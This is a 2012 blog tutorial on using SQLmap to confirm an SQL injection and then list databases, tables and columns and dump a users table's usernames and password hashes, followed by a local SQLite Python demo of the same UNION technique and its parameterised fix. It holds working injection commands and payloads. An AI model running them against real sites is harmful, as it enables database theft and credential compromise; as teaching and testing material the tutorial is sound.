
Tuesday, November 6, 2012

SQLmap Tutorial



Hello guys :)

Today I'm going to show you how to test an SQL-injectable site with SQLmap on BackTrack 5.
First of all you need a vulnerable page. The classic manual check is to add a single quote to the end of a parameter value in the URL, for example:

=> index.php?id=13'

If the page answers with a database error (MySQL's "You have an error in your SQL syntax" message, a broken or empty page, or simply a different result than id=13 gives), the parameter is probably being pasted straight into the query. No visible error does not prove the page is safe, though: blind injections show nothing in the response, and finding those is exactly what SQLmap is good at. Only do this against your own sites or sites you have permission to test.

I assume that you have basic knowledge about SQL injection before reading this tutorial :P

Second of all open BackTrack > Terminal, then type

cd /pentest/database/sqlmap

and hit Enter. That path is where BackTrack 5 keeps SQLmap; on any other system run sqlmap.py from wherever you unpacked it. Now we are inside the SQLmap directory, let's start :P

####################################################################

The options we will need here are:
+++++++++++++++++++++++++++++++++++++++++
-u        <= the target URL, with the injectable parameter in it
-D        <= select the database to work in
-T        <= select the table
-C        <= select the column(s), comma separated (-C user,pass)
--dbs     <= list the database names
--tables  <= list the tables of the selected database
--columns <= list the columns of the selected table
--dump    <= dump the rows of the selected table (all columns, or only the -C ones)
++++++++++++++++++++++++++++++++++++++++++
###################################################################

Let's start :)
Our first command will be:
./sqlmap.py -u "http://www.website.com/index.php?id=13" --dbs    <= Example!

Put the URL in quotes: "?" and "&" mean something to the shell, and a URL with more than one parameter (id=13&page=2) would be cut off at the "&" without them. Add --batch if you want SQLmap to take the default answer to every question it asks instead of stopping at each prompt.

SQLmap first tests the id parameter to confirm it is injectable, fingerprints the back-end DBMS, and then prints the database names. In the original post that output is a screenshot; what matters is the list of databases at the end of it.

Now we will ask for the tables in one of those databases: select the database with "-D" and ask for its tables with "--tables" :)
So we will type:
./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name --tables

I chose the walnut_live database, so I typed that command with -D walnut_live (shown as a screenshot in the original post).

The result will be the table names of course (again a screenshot in the original post).

Now we got the tables and found the users table!!
Now we select that table with "-T". We already selected the database, so the command is the same as before, but "--tables" is replaced by "-T table_name" (here the "users" table), and we ask for the columns inside that table with "--columns". It will be like:


./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name -T table_name --columns

Now we get the results, the columns (screenshot in the original post).

As you can see we got the "id", "pass" and "user" columns.
Now we want the data from them, so we dump it :P with "--dump".
There are two ways to get it: dump the whole table at once, or select the column(s) and dump only those.
I will show you how both of them look and are used.

First we can get all the data with this command:

./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name -T table_name --dump

which gets us every row of the table at once, user and pass included. In the picture I marked the user and pass :)

When SQLmap recognises the "pass" values as hashes it offers to crack them with its built-in wordlist; whether that succeeds depends on the hash type and on how weak the passwords are.

Now we will get them one column at a time with this command:

./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name -T table_name -C column_name --dump

-C also takes a comma-separated list, so -C user,pass dumps just those two columns in one run.

For example I will get user and pass:

User:: (the command above with -C user; the result was shown as a screenshot)

Pass:: (the same with -C pass; the result was shown as a screenshot)
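Here is an added example, not code from the original post or from the sqlmap project, that shows why the single-quote test at the start works and what the --tables, --columns and --dump steps above do underneath. It uses Python's built-in sqlite3 instead of MySQL, so sqlite_master and pragma_table_info stand in for MySQL's information_schema; the schema, the rows (the pass values are MD5 of throwaway test passwords) and the function names are all constructed for the example. It also shows the parameterised version of the same lookup, which is the fix a site owner should apply. SQLmap has several other techniques besides the UNION trick used here (error-based, boolean-blind, time-blind); this is only the simplest one.

```python
import sqlite3

# Constructed sample data (not from the post): a products table that the page looks up
# by id, and a users table shaped like the one found in the tutorial (id, user, pass).
# The pass values are MD5 of throwaway test passwords, not real credentials.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products VALUES (13, 'walnut desk', 120.0);
INSERT INTO products VALUES (14, 'oak chair', 45.5);
CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'bob', '0d107d09f5bbe40cade3de5c71e9e9b7');
"""


def new_db():
    """In-memory SQLite database loaded with the constructed schema above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """What a page like index.php?id=13 does when it concatenates the parameter into SQL.

    id_param is the raw query-string value. This is the bug SQLmap looks for.
    """
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """Hardened version: validate the type, then bind the value as data, never as SQL text."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # reject, instead of letting the database parse attacker input
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id=?", (id_value,)
    ).fetchall()


def quote_probe(conn, id_value="13"):
    """The manual test from the post: append a single quote and watch for a database error.

    Returns the error text if the quote broke the query (a strong sign of injection),
    or None if the page handled it without complaint.
    """
    try:
        vulnerable_lookup(conn, id_value + "'")
        return None
    except sqlite3.OperationalError as err:  # e.g. unrecognized token: "'"
        return str(err)


# The three functions below do by hand what sqlmap automates with --tables, --columns
# and --dump, using UNION to smuggle extra rows out through the vulnerable query.
# The original query returns 3 columns, so every UNION payload must also return 3;
# "0" is an id that matches no product, so only the injected rows come back.
# sqlite_master / pragma_table_info play the role information_schema plays on MySQL.

def enumerate_tables(conn):
    """Equivalent of -D db --tables."""
    payload = "0 UNION SELECT name, sql, NULL FROM sqlite_master WHERE type='table'"
    return sorted(row[0] for row in vulnerable_lookup(conn, payload))


def enumerate_columns(conn, table):
    """Equivalent of -T table --columns (pragma_table_info needs SQLite >= 3.16)."""
    payload = "0 UNION SELECT name, type, cid FROM pragma_table_info('%s')" % table
    rows = vulnerable_lookup(conn, payload)
    return [row[0] for row in sorted(rows, key=lambda r: r[2])]  # declared order


def dump_columns(conn, table, columns):
    """Equivalent of -T table -C col1,col2 --dump: pull the chosen columns out through the hole."""
    if not 1 <= len(columns) <= 3:
        raise ValueError("the vulnerable query has 3 columns; concatenate for wider dumps")
    select = ", ".join(columns + ["NULL"] * (3 - len(columns)))  # pad to 3 columns
    payload = "0 UNION SELECT %s FROM %s" % (select, table)
    rows = vulnerable_lookup(conn, payload)
    return sorted(tuple(row[: len(columns)]) for row in rows)


if __name__ == "__main__":
    db = new_db()
    print("quote probe:", quote_probe(db))
    print("tables:", enumerate_tables(db))
    print("users columns:", enumerate_columns(db, "users"))
    print("dump user,pass:", dump_columns(db, "users", ["user", "pass"]))
    print("same payload against the fixed page:",
          safe_lookup(db, "0 UNION SELECT user, pass, NULL FROM users"))
```

Run it and compare the two lookups: the concatenating one lets a single quote produce a parser error and a UNION pull the whole users table, while the bound-parameter one returns nothing for either payload and still works for a normal id.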



######################################################################

FOR EDUCATIONAL PURPOSE ONLY

######################################################################

Hope you all enjoy it :D
